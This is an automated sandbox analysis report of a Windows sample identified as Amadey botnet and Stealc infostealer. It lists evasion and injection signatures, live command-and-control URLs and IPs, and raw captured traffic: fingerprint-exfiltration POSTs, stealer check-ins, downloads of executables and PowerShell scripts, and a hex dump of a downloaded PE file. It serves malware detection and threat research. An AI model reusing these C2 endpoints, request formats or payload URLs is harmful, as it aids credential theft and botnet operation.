Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521602
MD5: 6c4b5fa44d73d27368a762b5581bcaae
SHA1: c31d79c81e6617d85db268ab62e56ab828e1a2dc
SHA256: a8e738eb5fe6baafc04c22dc1b21e84ce3b9fc12d1c651cca717ecc2a4f03428
Tags: exeuser-jstrosch
Infos:

Detection

Amadey, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\1000026002\cee706a53f.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000008.00000003.1924584689.0000000004F00000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 27.2.cee706a53f.exe.750000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\1000026002\cee706a53f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.8:49710 version: TLS 1.2

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49709 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49711
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49715 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49719 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49713 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49716 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49718 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49721 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49732 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49735 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49760 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49795 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49808 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49804 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 23:02:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 28 Sep 2024 22:56:39 GMTETag: "1c2200-62335e26d596b"Accept-Ranges: bytesContent-Length: 1843712Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 f9 b7 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 70 79 71 6c 66 6a 63 00 c0 19 00 00 e0 4f 00 00 be 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 63 78 66 68 75 64 6d 00 10 00 00 00 a0 69 00 00 06 00 00 00 fa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000023001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Sat, 28 Sep 2024 22:56:39 GMTIf-None-Match: "1c2200-62335e26d596b"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 2d 2d 0d 0a Data Ascii: ------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="hwid"9567758546661964116302------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="build"save------KFCGDBAKKKFBGDHJKFHJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 36 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000026002&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/ko.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 32 30 34 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000032042&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"9567758546661964116302------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"save------BGCAFHCAKFBFIECAFIIJ--
Source: global traffic HTTP traffic detected: GET /test/so.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 33 31 34 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000033142&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Sat, 28 Sep 2024 22:56:39 GMTIf-None-Match: "1c2200-62335e26d596b"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="hwid"9567758546661964116302------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build"save------JDGHIIJKEBGIDHIDBKJD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 35 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000035031&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"9567758546661964116302------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build"save------KKJKEBKFCAAECAAAAAEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 36 37 37 35 38 35 34 36 36 36 31 39 36 34 31 31 36 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="hwid"9567758546661964116302------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="build"save------HDHJEBFBFHJECAKFCAAK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 34 32 44 37 38 42 39 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB42D78B95B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
